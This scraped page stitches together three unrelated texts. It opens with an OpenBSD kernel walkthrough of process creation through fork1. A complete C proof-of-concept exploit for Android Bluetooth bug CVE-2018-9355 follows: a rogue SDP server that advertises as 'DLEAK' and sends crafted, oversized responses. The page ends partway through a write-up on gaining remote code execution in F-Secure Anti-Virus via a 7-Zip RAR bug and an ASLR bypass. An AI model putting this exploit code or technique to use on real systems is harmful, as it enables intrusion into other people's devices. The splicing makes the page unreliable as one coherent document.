OpenBSD Kernel Internals — Creation of process from user-space to kernel space.

GDB + Qemu (env)

Hello readers,

I know this time it is a little late, but I am also busy with some other professional things. 🙂

This time let’s discuss about the process creation in OpenBSD operating system from user-space level to kernel space.

We will take an example of the user-space process that will be launched from the Command Line Interface (console), for example, “ls”, and then what happens in kernel-space as a result of it.

I will divide this series into 3 parts, like creationexecutionexit, because the creation of process itself took some amount of time for me to learn, and analyzing or tracking from user-space to kernel-space had to be done line by line.

I have used gdb to debug the process and analyze it line by line.

Now, I will not waste your time too much.

Let’s dive into the user-space to kernel-space and learn and see the beauty of puffer.

I have divided the full process and functions that are used in the kernel into the points, so, I think it will be easy to read and learn.

Now, suppose you have launched “ls” command from CLI (xterm):

Here, the parent process is “ksh”, that is, default shell in OpenBSD which invokes “ls” command or any other command.

Every process is created by sys_fork() , that is, fork system call which is indirectly (internally) calls fork1()

fork1 — kernel developer’s manual

fork1() creates a new process out of p1, which should be the current thread. This function is used primarily to implement the fork(2) and vfork(2) system calls, as well as the kthread_create(9) function.

Life cycle of a process (in brief):

“ls” → fork(2) → sys_fork() → fork1() → sys_execve() → sys_exit() → exit1()

Under the hood working of fork1()

After “ls” from user-space it goes to fork() (libc) then from there to sys_fork().

sys_fork()

FORK_FORK: It is a macro which defines that the call is done by the fork(2)system call. Used only for statistics.

#define FORK_FORK 0x00000001

  • So, the value of flags variable is set to 1 , because the call is done by fork(2).
  • check for PTRACING then update the flags with PTRACE_FORK else leave it and return to the fork1()

Now, fork1()

fork1() initial code
  • The above code includes, curp->p_p->ps_comm is “ksh”, that is, parent process which will fork “ls” (user-space).
  • Initially some process structures, then, setting
    uid = curp->p_ucred->cr_ruid , it means setting the uid as real user id.
  • Then, the structure for process address space information.
  • Then, some variables and ptrace_state structure and then the condition checking using KASSERT.
  • fork_check_maxthread(uid) → it is used to the check or track the number of threads invoked by the specific uid .
  • It checks the number of threads invoked by specific uid shouldn’t be greater than the number of maximum threads allowed or also for maxthread —5 . Because the last 5 process from the maxthread is reserved for the root.
  • If it is greater than defined maxthread or maxthread — 5, it will print the messagetablefullonce every 10 seconds. Else, it will increment the number of threads.
fork_check_maxthread(uid)
  • Now, after fork_check_thread, again, the same implementation happens for tracking process. If you want you can have a look in our fork1 code screen-shot.

Now, we will proceed further,

fork1() code continued
  • It is changing the count of threads for a specific user via chgproccnt(uid,1).
chgproccnt()
  • uidinfo structure maintains every uid resource consumption counts, including the process count and socket buffer space usage.
  • uid_find function looks up and returns the uidinfo structure for uid. If no uidinfo structure exists for uid, a new structure will be allocated and initialized.

Then, it increments the ui_proccnt , that is, number of processes by diffand then returns count.

After, that, it is checks for the non-privileged uid and also that the number of process is greater than the soft limit of resources, that is, 9223372036854775807, from what I have found in gdb.

Have a look in the below screen-shot for the proper view of values:

(ddd) gdb output for resource limit

If non-privileged is allowed and the count is increased by the maximum resource limit, it will decrease the count via chgproccnt() by passing -1 as diff parameter and also decrease the number of processes and threads.

  • Next, the uvm_uarea_alloc() function allocates a thread’s ‘uarea’, the memory where its kernel stack and PCB are stored.

Now, it checks if the uaddr variable doesn’t contain any thread’s address, if it is zero, then it decrements the count of the number of process and thread.

Now, there are the some important functions:

→ thread_new(struct proc *parent, vaddr_t uaddr)

→ process_new(struct proc *p, struct process *parent, int flags)

thread_new(curp, uaddr)

Here, in the thread_new function, we will get our user-space process, that is, in our case “ls”. The process gets retrieved from the pool of process, that is, proc_pool via pool_get() function.

Then, we set the state of the thread to be SIDL , which means that the process/thread is being created by fork . We then setp →p_flag = 0.

Now, they are zeroing the section of proc . See, the below code snippet from sys/proc.h

code snippet for members that will be zeroed upon creation in fork, via memset

In above code snippet, all the variables will be zeroed via memset upon creation in the fork.

Then, they are copying the section from parent→p_startcopy to
p→p_startcopyvia memcpy. Have a look below in the screen-shot to know which of the field members will be copied.

code snippet for the members those will be copied upon in fork
  • The, crhold(p->p_ucred) means it will increment the reference count in struct ucred structure, that is, p->p_ucred->cr_ref++ .
  • Now, typecast the thread’s addr, that is, (struct user *)uaddr and save it in kernel’s virtual addr of u-area.
  • Now, it will initialize the timeout.

dummy function to show the timeout_set function working.

timeout_set(timeout, b, argument)

It means initialize the timeout struture and call the function b with argument .

void
timeout_set(struct timeout *new, void (*fn)(void *), void *arg)
{
        new->to_func = fn;
        new->to_arg = arg;
        new->to_flags = TIMEOUT_INITIALIZED;
}

scheduler_fork_hook(parent, p): It is a macro which will update the p_estcpu of child from parent’s p_estcpu.

p_estcpu holds an estimate of the amount of CPU that the process has used recently

/* Inherit the parent’s scheduler history */
#define scheduler_fork_hook(parent, child) do {    \
 (child)->p_estcpu = (parent)->p_estcpu;           \
} while (0)

Then, return the newly created thread p .

Now, another important function is process_new() which will create the process in a similar fashion to what we have seen above in the thread_newfunc.

  • process_new(struct proc *p, struct process *parent, int flags)
process_new(p,curpr,flags)

In above code snippet, the same thing is happening again like select process from process_pool via pool_get then zeroing using memset and copying using memcpy.

So, for the detailed explanation, please go through the thread_new() function first.

Next is initialization of process using process_initialize function.

process_initialize(pr, p)

ps_mainproc : It is the original and main thread in the process. It’s only special for the handling of p_xstat and some signal and ptrace behaviours that need to be fixed.

→Copy initial thread, that is, p to pr->mainproc .

→Initialize the queue with referenced by head. Here, head is pr→ps_threads. Then, Insert elm at the TAIL of the queue. Here, elm is p .

→set the number of references to 1, that is, pr->ps_refcnt = 1

→copy the process pr to the process of initial thread.

→set the same creds for process as the initial thread.

→condition check for the new thread and the new process via KASSERT.

→Initialize the List referenced by head. Here, head is pr->ps_children

→Again, initialize timeout. (for detail, see thead_new)

Now, after the process initialization, pid allocation takes place.

ps→ps_pid = allocpid(); allocpid() returns unused pid

allocpid() internally calls the arc4random_uniform() which again calls the arc4random() then via arc4random() a fully randomized number is returned which is used as pid.

Then, for the availability of pid, or in other words, for unused pid, it verifies that whether the new pid is already taken or not by any process. It verifies this one by one in the process, process groups, and zombie process by using function ispidtaken(pid_t pid) which internally calls these functions:

  • prfind(pid_t pid) : Locate a process by number
  • pgfind(pid_t pgid) : Locate a process group by number
  • zombiefind(pid_t pid :Locate a zombie process by number
code snippet for allocpid and ispidtaken

Now, store the pointer to parent process in pr→ps_pptr .

Increment the number of references count in process limit structure, that is, struct plimit .

Store the vnode of executable of parent into pr→ps_textvp ,that is, pr→ps_textvp = parent→ps_textvp; .

if (pr→ps_textvp)
        vref(pr→ps_textvp); /* vref --> vnode reference */

Above code snippet means, if valid vnode found then increment the v_usecount++ variable inside the struct vnode structure of the executable.

Now, the calculation for setting up process flags:

pr→ps_flags = parent →ps_flags & (PS_SUGID | PS_SUGIDEXEC | PS_PLEDGE | PS_EXECPLEDGE | PS_WXNEEDED);
pr →ps_flags = parent →ps_flags & (0x10 | 0x20 | 0x100000 | 0x400000 | 0x200000)
if (vnode of controlling terminal != NULL)
        pr→ps_flags |= parent→ps_flags & PS_CONTROLT;

process_new continued…

process_new continued…

Checks:

* if child_able_to_share_file_descriptor_table_with_parent:
         pr->ps_fd = fdshare(parent)      /* share the table */
  else
         pr->ps_fd = fdcopy(parent)       /* copy the table */
* if child_able_to_share_the_parent's_signal_actions:
         pr->ps_sigacts = sigactsshare(parent) /* share */
  else
         pr->ps_sigacts = sigactsinit(parent)  /* copy */
* if child_able_to_share_the_parent's addr space:
         pr->ps_vmspace = uvmspace_share(parent)
  else
         pr->ps_vmspace = uvmspace_fork(parent)
* if process_able_to_start_profiling:
         smartprofclock(pr);    /* start profiling on a process */
* if check_child_able_to_start_ptracing:
         pr->ps_flags |= parent->ps_flags & PS_PTRACED
* if check_no_signal_or_zombie_at_exit:
         pr->ps_flags |= PS_NOZOMBIE /*No signal or zombie at exit
* if check_signals_stat_swaping:
         pr->ps_flags |= PS_SYSTEM

update the pr→ps_flags with PS_EMBRYO by ORing it, that is,
pr→ps_flags |= PS_EMBRYO /* New process, not yet fledged */

membar_producer() → Force visibility of all of the above changes.

— All stores preceding the memory barrier will reach global visibility before any stores after the memory barrier reach global visibility.

In short, I think it is used to forcefully make visible changes globally.

Now, Insert the new elm, that is, pr at the head of the list. Here, head is allprocess .

  • return pr

fork1() continued…

fork1() continued…

Substructures
p→p_fd and p→p_vmspace directly copy of pr→ps_fd and pr→ps_vmspace.

substructures

checks,

** if (process_has_no_signals_stats_or_swapping) then atomically set bits.

atomic_setbits_int(pr →ps_flags, PS_SYSTEM);

** if (child_is_suspending_the_parent_process_until_the_child_is terminated (by calling _exit(2) or abnormally), or makes a call to execve(2)) then atomically set bits,

atomic_setbits_int(pr →ps_flags, PS_PPWAIT);
atomic_setbits_int(pr →ps_flags, PS_ISPWAIT);

#ifdef KTRACE
/* Some KTRACE related things */
#endif

cpu_fork(curp, p, NULL, NULL, func, arg ?arg: p)

— To create or Update PCB and make child ready to RUN.

/*
 * Finish creating the child thread. cpu_fork() will copy
 * and update the pcb and make the child ready to run. The
 * child will exit directly to user mode via child_return()
 * on its first time slice and will not return here.
 */

Address space,
vm = pr→ps_vmspace

if (call is done by fork syscall); then
increment the number of fork() system calls.
update the vm_pages affected by fork() syscall with addition of data page and stack page.
else if (call is done by vfork() syscall); then
do as same as if it was fork syscall but for vfork system call. (see above if {for fork})
else
increment the number of kernel threads created.

Check,

If (process is being traced && created by fork system call);then
{
        The malloc() function allocates the uninitialized memory in the kernel address space for an object whose size is specified by size, that is, here, sizeof(*newptstat). And, struct ptrace_state *newptstat
}

allocate thread ID, that is, p→p_tid = alloctid();
This is also the same calling arc4random directly and using tfind function for finding the thread ID by number.

* inserts the new element p at the head	of the allprocess list.
* insert the new element p at the head of the thread hash list.
* insert the new element pr at the head of the process hash list.
* insert the new element pr after the curpr element.
* insert the new element pr at the head of the children process  list.

fork1() continued…

fork1 continued…

Again,
If (isProcessPTRACED())
{
then save the parent process id during ptracing, that is,
pr→ps_oppid = curpr→ps_pid .
If (pointer to parent process_of_child != pointer to parent process_of_current_process)
{
proc_reparent(pr, curpr→ps_pptr); /* Make current process the new parent of process child, that is, pr*/

Now, check whether newptstat contains some address, in our case, newptstat contains a kernel virtual address returned by malloc(9.
If above condition is True, that is, newptstat != NULL . Then, set the ptrace status:
Set newptstat point to the ptrace state structure. Then, make the newptstatpoint to NULL .

→Update the ptrace status to the curpr process and also the pr process.

curpr->ps_ptstat->pe_report_event = PTRACE_FORK;
pr->ps_ptstat->pe_report_event = PTRACE_FORK;
curpr->ps_ptstat->pe_other_pid = pr->ps_pid;
pr->ps_ptstat->pe_other_pid = curpr->ps_pid;

Now, for the new process set accounting bits and mark it as complete.

  • get the nano time to start the process.
  • Set accounting flags to AFORK which means forked but not execed.
  • atomically clear the bits.
  • Then, check for the new child is in the IDLE state or not, if yes then make it runnable and add it to the run queue by fork_thread_start function.
  • If it is not in the IDLE state then put arg to the current CPU, running on.

Freeing the memory or kernel virtual address that is allocated by malloc for newptstat via free .

Notify any interested parties about the new process via KNOTE .

Now, update the stats counter for successfully forked.

uvmexp.forks++; /* -->For forks */
if (flags & FORK_PPWAIT)
        uvmexp.forks_ppwait++; /* --> counter for forks where parent waits */
if (flags & FORK_SHAREVM)
        uvmexp.forks_sharevm++; /* --> counter for forks where vmspace is shared */

Now, pass pointer to the new process to the caller.

if (rnewprocp != NULL)
        *rnewprocp = p;
fork1 continued…
  • setting the PPWAIT on child and the PS_ISPWAIT on ourselves, that is, the parent and then go to the sleep on our process via tsleep .
  • Check, If the child is started with tracing enables && the current process is being traced then alert the parent by using SIGTRAP signal.
  • Now, return the child pid to the parent process.
  • return (0)

Then, finally, I have seen in the debugger that after the fork1, it jumps to sys/arch/amd64/amd64/trap.c file for system call handling and for the setting frame.

Some of the machine independent (MI) functions defined in sys/sys/syscall_mi.h file, like, mi_syscall()mi_syscall_return() and mi_child_return().

Then, after handling the system calls from trap.c then, control pass to the sys_execve system call, which I will explain later (in the second part) and also I will explain more about the trap.c code in upcoming posts. It has already become a long post.

References:

PoC for Android Bluetooth bug CVE-2018-9355

CVE-2018-9355 A-74016921 RCE Critical 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0, 8.1
Картинки по запросу Android Kernel CVE POC
/*
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 *
 */

/** CVE-2018-9355
 *  https://source.android.com/security/bulletin/2018-06-01
 */

#include <errno.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdbool.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <pthread.h>

#include <bluetooth/bluetooth.h>
#include <bluetooth/sdp.h>
#include <bluetooth/l2cap.h>
#include <bluetooth/hci.h>
#include <bluetooth/hci_lib.h>


#define EIR_FLAGS                   0x01  /* flags */
#define EIR_NAME_COMPLETE           0x09  /* complete local name */
#define EIR_LIM_DISC                0x01 /* LE Limited Discoverable Mode */
#define EIR_GEN_DISC                0x02 /* LE General Discoverable Mode */

#define DATA_ELE_SEQ_DESC_TYPE 6
#define UINT_DESC_TYPE 1


#define SIZE_SIXTEEN_BYTES 4
#define SIZE_EIGHT_BYTES 3
#define SIZE_FOUR_BYTES 2
#define SIZE_TWO_BYTES 1
#define SIZE_ONE_BYTE 0
#define SIZE_IN_NEXT_WORD 6
#define TWO_COMP_INT_DESC_TYPE 2
#define UUID_DESC_TYPE 3
#define ATTR_ID_SERVICE_ID 0x0003

static int count = 0;
static int do_continuation;

static int init_server(uint16_t mtu)
{
	struct l2cap_options opts;
	struct sockaddr_l2 l2addr;
	socklen_t optlen;
	int l2cap_sock;

	/* Create L2CAP socket */
	l2cap_sock = socket(PF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_L2CAP);
	if (l2cap_sock < 0) {
		printf("opening L2CAP socket: %s", strerror(errno));
		return -1;
	}

	memset(&l2addr, 0, sizeof(l2addr));
	l2addr.l2_family = AF_BLUETOOTH;
	bacpy(&l2addr.l2_bdaddr, BDADDR_ANY);
	l2addr.l2_psm = htobs(SDP_PSM);

	if (bind(l2cap_sock, (struct sockaddr *) &l2addr, sizeof(l2addr)) < 0) {
		printf("binding L2CAP socket: %s", strerror(errno));
		return -1;
	}

	int opt = L2CAP_LM_MASTER;
	if (setsockopt(l2cap_sock, SOL_L2CAP, L2CAP_LM, &opt, sizeof(opt)) < 0) {
		printf("setsockopt: %s", strerror(errno));
		return -1;
	}

	memset(&opts, 0, sizeof(opts));
	optlen = sizeof(opts);

	if (getsockopt(l2cap_sock, SOL_L2CAP, L2CAP_OPTIONS, &opts, &optlen) < 0) {
		printf("getsockopt: %s", strerror(errno));
		return -1;
	}
	opts.omtu = mtu;
	opts.imtu = mtu;

	if (setsockopt(l2cap_sock, SOL_L2CAP, L2CAP_OPTIONS, &opts, sizeof(opts)) < 0) {
		printf("setsockopt: %s", strerror(errno));
		return -1;
	}

	if (listen(l2cap_sock, 5) < 0) {
	  printf("listen: %s", strerror(errno));
	  return -1;
	}

	return l2cap_sock;
}

static int process_service_search_req(uint8_t *pkt)
{
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;


	/* Total Handles */
	bt_put_be16(400, pkt); pkt += 2;
	bt_put_be16(400, pkt); pkt += 2;

	/* and that's it! */
	/* TODO: Can we do some heap grooming to make sure we don't get a continuation? */

	//bt_put_be16((pkt - start) - 2, lenloc);
	return pkt - start;
}

static uint8_t *place_uid(uint8_t *pkt, int o)
{
	int i;
	for (i = 0; i < 16; i++)
		*pkt++ = 0x16 + (i + o);
	return pkt;

}

static size_t flood_u128s(uint8_t *pkt)
{
	int i;
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;
	size_t retsize = 0;

	bt_put_be16(9, pkt);pkt += 2;

	if (do_continuation == 1) {
		*pkt = DATA_ELE_SEQ_DESC_TYPE << 3;
		*pkt |= SIZE_IN_NEXT_WORD;
		pkt++;
		start = pkt;
		pkt += 2;
	}

	//*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	//pkt++;

	for (i = 0; i < 31; i++) {
		*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
		pkt++;

		*pkt = (UINT_DESC_TYPE << 3) | SIZE_TWO_BYTES;;
		pkt++;
		/* Attr ID */
		bt_put_be16(ATTR_ID_SERVICE_ID, pkt); pkt += 2;

		*pkt = (UUID_DESC_TYPE << 3) | SIZE_SIXTEEN_BYTES;
		pkt++;
		pkt = place_uid(pkt, i);
	}
	/* Set the continuation */
	if (do_continuation) {
		bt_put_be16(654, lenloc);
		bt_put_be16(651 * 2, start);
		*pkt = 1;
		retsize = 658;
	}
	else {
		bt_put_be16(651, lenloc);
		//bt_put_be16(648, start);
		*pkt = 0;
		retsize = 654;
	}
	//	bt_put_be16((pkt - lenloc) + 10, lenloc);
	//	bt_put_be16((pkt - start) + 10, start);
	printf("%s: size is pkt - lenloc %zu and pkt is 0x%02x\n", __func__, pkt - lenloc, *pkt);
	pkt++;

	return retsize;

}

static size_t do_fake_svcsar(uint8_t *pkt)
{

	int i;
	uint8_t *start = pkt;
	uint8_t *lenloc = pkt;
	/* Id and length -- ignored in the code */
	//bt_put_be16(0, pkt);pkt += 2;
	//bt_put_be16(0xABCD, pkt);pkt += 2;
	/* list byte count */
	bt_put_be16(9, pkt);pkt += 2;

	*pkt = DATA_ELE_SEQ_DESC_TYPE << 3;
	*pkt |= SIZE_EIGHT_BYTES;
	pkt++;

	*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	pkt++;

	*pkt = (UINT_DESC_TYPE << 3) | SIZE_TWO_BYTES;;
	pkt++;
	/* Attr ID */
	bt_put_be16(0x0100, pkt); pkt += 2;

	*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	pkt++;

	*pkt = (DATA_ELE_SEQ_DESC_TYPE << 3) | SIZE_TWO_BYTES;
	pkt++;

	/* Set the continuation */
	if (do_continuation)
		*pkt = 1;
	else
		*pkt = 1;
	pkt++;

	/* Place the size... */
	//bt_put_be16((pkt - start) - 2, lenloc);

	printf("%zu\n", pkt-start);
	return (size_t) (pkt - start);
}

static void process_request(uint8_t *buf, int fd)
{
	sdp_pdu_hdr_t *reqhdr = (sdp_pdu_hdr_t *) buf;
	sdp_pdu_hdr_t *rsphdr;
	uint8_t *rsp = malloc(65535);
	int status = SDP_INVALID_SYNTAX;
	int send_size = 0;

	memset(rsp, 0, 65535);
	rsphdr = (sdp_pdu_hdr_t *)rsp;
	rsphdr->tid = reqhdr->tid;

	switch (reqhdr->pdu_id) {
	case SDP_SVC_SEARCH_REQ:
		printf("Got a svc srch req\n");
		send_size = process_service_search_req(rsp + sizeof(sdp_pdu_hdr_t));
		rsphdr->pdu_id = SDP_SVC_SEARCH_RSP;
		rsphdr->plen = htons(send_size);
		break;
	case SDP_SVC_ATTR_REQ:
		printf("Got a svc attr req\n");
		//status = service_attr_req(req, &rsp);
		rsphdr->pdu_id = SDP_SVC_ATTR_RSP;
		break;
	case SDP_SVC_SEARCH_ATTR_REQ:
		printf("Got a svc srch attr req\n");
		//status = service_search_attr_req(req, &rsp);
		rsphdr->pdu_id = SDP_SVC_SEARCH_ATTR_RSP;
		send_size = flood_u128s(rsp + sizeof(sdp_pdu_hdr_t));
		//do_fake_svcsar(rsp + sizeof(sdp_pdu_hdr_t)) + 3;
		rsphdr->plen = htons(send_size);
		break;
	default:
		printf("Unknown PDU ID : 0x%x received", reqhdr->pdu_id);
		status = SDP_INVALID_SYNTAX;
		break;
	}
	printf("%s: sending %zu\n", __func__, send_size + sizeof(sdp_pdu_hdr_t));
	send(fd, rsp, send_size + sizeof(sdp_pdu_hdr_t), 0);
	free(rsp);
}


static void *l2cap_data_thread(void *input)
{
	int fd = *(int *)input;
	sdp_pdu_hdr_t hdr;
	uint8_t *buf;
	int len, size;

	while (true) {
		len = recv(fd, &hdr, sizeof(sdp_pdu_hdr_t), MSG_PEEK);
		if (len < 0 || (unsigned int) len < sizeof(sdp_pdu_hdr_t)) {
			continue;
		}

		size = sizeof(sdp_pdu_hdr_t) + ntohs(hdr.plen);
		buf = malloc(size);
		if (!buf)
			continue;

		printf("%s: trying to recv %d\n", __func__, size);
		len = recv(fd, buf, size, 0);
		if (len <= 0) {
			free(buf);
			continue;
		}

		if (!count) {
			process_request(buf, fd);
			count ++;
		}
		if (count >= 1) {
			do_continuation = 0;
			process_request(buf, fd);
			count++;
		}

		free(buf);
	}
}

/* derived from hciconfig.c */
static void *advertiser(void *unused)
{
	uint8_t status;
	int device_id, handle;
	struct hci_request req = { 0 };
	le_set_advertise_enable_cp acp = { 0 };
	le_set_advertising_parameters_cp avc = { 0 };
	le_set_advertising_data_cp data = { 0 };

	device_id = hci_get_route(NULL);

	if (device_id < 0) {
		printf("%s: Failed to get route: %s\n", __func__, strerror(errno));
		return NULL;
	}
	handle = hci_open_dev(hci_get_route(NULL));
	if (handle < 0) {
		printf("%s: Failed to open and aquire handle: %s\n", __func__, strerror(errno));
		return NULL;
	}

	avc.min_interval = avc.max_interval = htobs(150);
	avc.chan_map = 7;
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISING_PARAMETERS;
	req.cparam = &avc;
	req.clen = LE_SET_ADVERTISING_PARAMETERS_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	if (hci_send_req(handle, &req, 1000) < 0) {
		hci_close_dev(handle);
		printf("%s: Failed to send request %s\n", __func__, strerror(errno));
		return NULL;
	}
	memset(&req, 0, sizeof(req));
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISE_ENABLE;
	req.cparam = &acp;
	req.clen = LE_SET_ADVERTISE_ENABLE_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	data.data[0] = htobs(2);
	data.data[1] = htobs(EIR_FLAGS);
	data.data[2] = htobs(EIR_GEN_DISC | EIR_LIM_DISC);

	data.data[3] = htobs(6);
	data.data[4] = htobs(EIR_NAME_COMPLETE);
	data.data[5] = 'D';
	data.data[6] = 'L';
	data.data[7] = 'E';
	data.data[8] = 'A';
	data.data[9] = 'K';

	data.length = 10;

	memset(&req, 0, sizeof(req));
	req.ogf = OGF_LE_CTL;
	req.ocf = OCF_LE_SET_ADVERTISING_DATA;
	req.cparam = &data;
	req.clen = LE_SET_ADVERTISING_DATA_CP_SIZE;
	req.rparam = &status;
	req.rlen = 1;

	if (hci_send_req(handle, &req, 1000) < 0) {
		hci_close_dev(handle);
		printf("%s: Failed to send request %s\n", __func__, strerror(errno));
		return NULL;
	}
	printf("Device should be advertising under DLEAK\n");
}



int main(int argc, char **argv)
{
	pthread_t *io_channel;
	pthread_t adv;
	int       fds[16];
	const int io_chans = 16;
	struct sockaddr_l2 addr;
	socklen_t qlen = sizeof(addr);
	socklen_t len = sizeof(addr);
	int l2cap_sock;
	int i;


	pthread_create(&adv, NULL, advertiser, NULL);
	l2cap_sock = init_server(652);
	if (l2cap_sock < 0)
		return EXIT_FAILURE;

	io_channel = malloc(io_chans * sizeof(*io_channel));
	if (!io_channel)
		return EXIT_FAILURE;

	do_continuation = 1;
	for (i = 0; i < io_chans; i++) {
		printf("%s: Going to accept on io chan %d\n", __func__, i);
		fds[i] = accept(l2cap_sock, (struct sockaddr *) &addr, &len);
		if (fds[i] < 0) {
			i--;
			printf("%s: Accept failed with %s\n", __func__, strerror(errno));
			continue;
		}
		printf("%s: accepted\n", __func__);
		pthread_create(&io_channel[i], NULL, l2cap_data_thread, &fds[i]);
	}
}

F-Secure Anti-Virus: Remote Code Execution via Solid RAR Unpacking

As I briefly mentioned in my last two posts about the 7-Zip bugs CVE-2017-17969, CVE-2018-5996, and CVE-2018-10115, the products of at least one antivirus vendor were affected by those bugs. Now that all patches have been rolled out, I can finally make the vendor’s name public: It is F-Secure with all of its Windows-based endpoint protection products (including consumer products such as F-Secure Anti-Virus as well as corporate products such as F-Secure Server Security).

Even though F-Secure products are directly affected by the mentioned 7-Zip bugs, exploitation is substantially more difficult than it was in 7-Zip (before version 18.05), because F-Secure properly deploys ASLR. In this post, I am presenting an extension to my previous 7-Zip exploit of CVE-2018-10115 that achieves Remote Code Execution on F-Secure products.

Introduction

In my previous 7-Zip exploit, I demonstrated how we can use 7-Zip’s methods for RAR header processing to massage the heap. This was not completely trivial, but after that, we were basically done. Since 7-Zip 18.01 came without ASLR, a completely static ROP chain was enough to obtain code execution.

With F-Secure deploying ASLR, such a static ROP chain cannot work anymore, and an additional idea is required. In particular, we need to compute the ROP chain dynamically. In a scriptable environment, this is usually quite easy: Simply leak a pointer to derive the base address of some module, and then just add this base address to the prepared ROP chain.

Since the bug we try to exploit resides within RAR extraction code, a promising idea could be to use the RarVM as a scripting environment to compute the ROP chain. I am quite confident that this would work, if only the RarVM were actually available. Unfortunately, it is not: Even though 7-Zip’s RAR implementation supports the RarVM, it is disabled by default at compile time, and F-Secure did not enabled it either.

While it is almost certain the F-Secure engine contains some attacker-controllable scripting engine (outside of the 7-Zip module), it seemed difficult to exploit something like this in a reliable manner. Moreover, my goal was to find an ASLR bypass that works independently of any F-Secure features. Ideally, the new exploit would also work for 7-Zip (with ASLR), as well as any other software that makes use of 7-Zip as a library.

In the following, I will briefly recap the most important aspects of the exploited bug. Then, we will see how to bypass ASLR in order to achieve code execution.

The Bug

The bug I am exploiting is explained in detail in my previous blog post. In essence, it is an uninitialized memory usage that allows us to control a large part of a RAR decoder’s state. In particular, we are going to use the Rar1 decoder. The method NCompress::NRar1::CDecoder::LongLZ1 contains the following code:

if (AvrPlcB > 0x28ff) { distancePlace = DecodeNum(PosHf2); }
else if (AvrPlcB > 0x6ff) { distancePlace = DecodeNum(PosHf1); }
else { distancePlace = DecodeNum(PosHf0); }
// some code omitted
for (;;) {
  dist = ChSetB[distancePlace & 0xff];
  newDistancePlace = NToPlB[dist++ & 0xff]++;
  if (!(dist & 0xff)) { CorrHuff(ChSetB,NToPlB); }
  else { break; }
}

ChSetB[distancePlace] = ChSetB[newDistancePlace];
ChSetB[newDistancePlace] = dist;

This is very useful, because the uint32_t arrays ChSetB and NtoPlB are fully attacker controlled (since they are not initialized if we trigger this bug). Hence, newDistancePlace is an attacker-controlled uint32_t, and so is dist (with the restriction that the least significant byte cannot be 0xff). Moreover, distancePlace is determined by the input stream, so it is attacker-controlled as well.

So this gives us a pretty good read-write primitive. Note, however, that it has a few restrictions. In particular, the executed operation is basically a swap. We can use the primitive to do the following:

  • We can read arbitrary uint32_t values from 4-byte aligned 32-bit offsets starting from &ChSetB[0] into the ChSetB array. If we do this, we always overwrite the value we just read (since it is a swap).
  • We can write uint32_t values from the ChSetB array to arbitrary 4-byte aligned 32-bit offsets starting from &ChSetB[0]. Those values can be either constants, or values that we have read before into the ChSetB array. In any case, the least significant byte must not be 0xff. Furthermore, since we are swapping values, a written value is always destroyed (within the ChSetB array) and cannot be written a second time.

Lastly, note that the way the index newDistancePlace is determined restricts us further. First, we cannot do too many of such read/write operations, since the array NToPlB has only 256 elements. Second, if we are writing a value that is unknown in advance (say, a part of an address subject to ASLR), we might not know exactly what dist & 0xff is, so we need to fill (possibly many) different entries in the NToPlB with the desired index.

It is clear that this basic read-write primitive for itself is not enough to bypass ASLR. An additional idea is required.

Exploitation Strategy

We make use of roughly the same exploitation strategy as in the 7-Zip exploit:

  1. Place a Rar3 decoder object in constant distance after the Rar1 decoder containing the read-write primitive.
  2. Use the Rar3 decoder to extract the payload into the _window buffer.
  3. Use the read-write primitive to swap the Rar3 decoder’s vtable pointer with the _window pointer.

Recall that in the 7-Zip exploit, the payload we extracted in step 2 contained a stack pivot, the (static) ROP chain, and the shellcode. Obviously, such a static ROP chain cannot work in an environment with full ASLR. So how do we dynamically extract a valid ROP chain into the buffer without knowing any address in advance?

Bypassing ASLR

We are in a non-scriptable environment, but we still want to correct our ROP chain by a randomized offset. Specifically, we would like to add 64-bit integers.

Well, we might not need a full 64-bit addition. The ability to adjust an address by overwriting the least significant bytes of it could suffice. Note, however, that this does not work in general. Consider &f being a randomized address to some function. If the address was a completely uniform random 64-bit value, and we would just overwrite the least significant byte, then we would not know by how much we changed the address. However, the idea works if we know nothing about the address, except for the d least significant bytes. In this case, we can safely overwrite the d least significant bytes, and we will always know by how much we changed the address. Luckily2, Windows loads every module at a (randomized) 64K aligned address. This means, that the two least significant bytes of any code address will be constant.

Why is this idea useful in our case? As you might know, RAR is strongly based on Lempel–Ziv compression algorithms. In these algorithms, the coder builds a dynamic dictionary, which contains sequences of bytes that occurred earlier in the compressed stream. If a byte sequence is repeating itself, then it can be encoded efficiently as a reference to the corresponding entry in the dictionary.

In RAR, the concept of a dynamic dictionary occurs in a generalized form. In fact, on an abstract level, the decoder executes in every step one of the following two operations:

  1. PutByte(bytevalue), or
  2. CopyBlock(distance,num)

The operation CopyBlock copies num bytes, starting from distance bytes before the current position of the window buffer. This gives rise to the following idea:

  1. Use the read-write primitive to write a function pointer to the end of our Rar3 window buffer. This function pointer is the 8-byte address &7z.dll+c for some (known) constant c.
  2. The base address &7z.dll is strongly randomized, but it is always 64K aligned. Hence, we can make use of the idea explained at the beginning of this section: First, we write two arbitrary bytes of our choice (using two invocations of PutByte(b)). Then, we copy (by using a CopyBlock(d,n) operation) the six most significant bytes of the function pointer &7z.dll+c from the end of the window buffer. Together, they form eight bytes, a valid address, pointing to executable code.

